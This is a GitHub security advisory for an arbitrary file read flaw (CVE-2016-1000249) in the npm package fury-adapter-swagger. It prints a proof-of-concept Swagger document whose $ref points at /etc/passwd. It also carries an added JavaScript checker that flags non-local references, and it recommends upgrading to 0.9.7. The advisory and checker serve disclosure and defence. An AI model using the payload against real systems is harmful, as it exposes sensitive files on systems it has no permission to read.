High severity · GHSA Advisory · Published Sep 1, 2020 · Updated Sep 11, 2023

fury-adapter-swagger allows arbitrary file read from system

CVE-2016-1000249

Description

fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.

Proof of Concept:

---
swagger: '2.0'
info:
  title: Read local files
  version: '1.0'

paths:
  /foo:
    get:
      responses:
        200:
          description: Some description
          examples:
            text/html:
              example:
                $ref: '/etc/passwd'
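As an added defensive example (not code from fury-adapter-swagger or from the advisory itself), the JavaScript below walks a parsed Swagger document and flags every `$ref` that is not an in-document JSON Pointer, so a document like the proof of concept above is rejected before any reference resolver is given the chance to open a path on the filesystem. The function names and the sample documents are this example's own; the proof-of-concept document is reproduced as a JS object literal (what a YAML loader would produce) rather than loaded from YAML so the example runs without dependencies.

```javascript
// Added example: pre-check a Swagger/OpenAPI document for $ref values that
// could be resolved outside the document. Not part of fury-adapter-swagger;
// all function names here are this example's own.

// Classify a $ref value. Only fragment-only references ("#/definitions/Pet")
// are treated as safe; anything a resolver might map to a file or URL
// (absolute paths, file:/http: URIs, relative paths) is reported.
function classifyRef(ref) {
  if (typeof ref !== 'string') return 'malformed';
  if (ref.startsWith('#')) return 'local';
  // POSIX absolute path or Windows drive path (checked before the URI test,
  // because "C:\..." would otherwise look like a one-letter scheme).
  if (ref.startsWith('/') || /^[a-zA-Z]:[\\/]/.test(ref)) return 'absolute-path';
  if (/^[a-z][a-z0-9+.-]*:/i.test(ref)) return 'uri';
  return 'relative-path';
}

// Escape one path segment per RFC 6901 so reported locations are valid pointers.
function escapePointerSegment(segment) {
  return String(segment).replace(/~/g, '~0').replace(/\//g, '~1');
}

// Recursively collect every non-local $ref as { location, ref, kind }.
function findExternalRefs(node, location = '#', found = []) {
  if (Array.isArray(node)) {
    node.forEach((item, i) => findExternalRefs(item, `${location}/${i}`, found));
  } else if (node && typeof node === 'object') {
    for (const [key, value] of Object.entries(node)) {
      if (key === '$ref') {
        const kind = classifyRef(value);
        if (kind !== 'local') found.push({ location, ref: value, kind });
      } else {
        findExternalRefs(value, `${location}/${escapePointerSegment(key)}`, found);
      }
    }
  }
  return found;
}

// Gate to call before handing a document to a parser or resolver.
function isSafeToResolve(doc) {
  return findExternalRefs(doc).length === 0;
}

// Constructed sample: the advisory's proof-of-concept document as an object.
const pocDocument = {
  swagger: '2.0',
  info: { title: 'Read local files', version: '1.0' },
  paths: {
    '/foo': {
      get: {
        responses: {
          200: {
            description: 'Some description',
            examples: { 'text/html': { example: { $ref: '/etc/passwd' } } },
          },
        },
      },
    },
  },
};

// Constructed sample that only uses an in-document reference.
const benignDocument = {
  swagger: '2.0',
  info: { title: 'Benign', version: '1.0' },
  definitions: { Pet: { type: 'object' } },
  paths: {
    '/pets': {
      get: { responses: { 200: { description: 'ok', schema: { $ref: '#/definitions/Pet' } } } },
    },
  },
};

console.log('poc document external refs:', findExternalRefs(pocDocument));
console.log('poc safe to resolve?', isSafeToResolve(pocDocument));
console.log('benign safe to resolve?', isSafeToResolve(benignDocument));
```

The check is deliberately an allowlist: rather than trying to enumerate dangerous paths, it accepts only references that stay inside the document, which is the only kind a parser that simply describes an API needs. Reporting the JSON Pointer location lets an operator point at the exact offending element in a rejected document.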

Recommendation

Upgrade to version 0.9.7 or later.


Affected packages

Versions sourced from the GitHub Security Advisory.

Package:            fury-adapter-swagger (npm)
Affected versions:  >= 0.2.0, < 0.9.7
Patched versions:   0.9.7
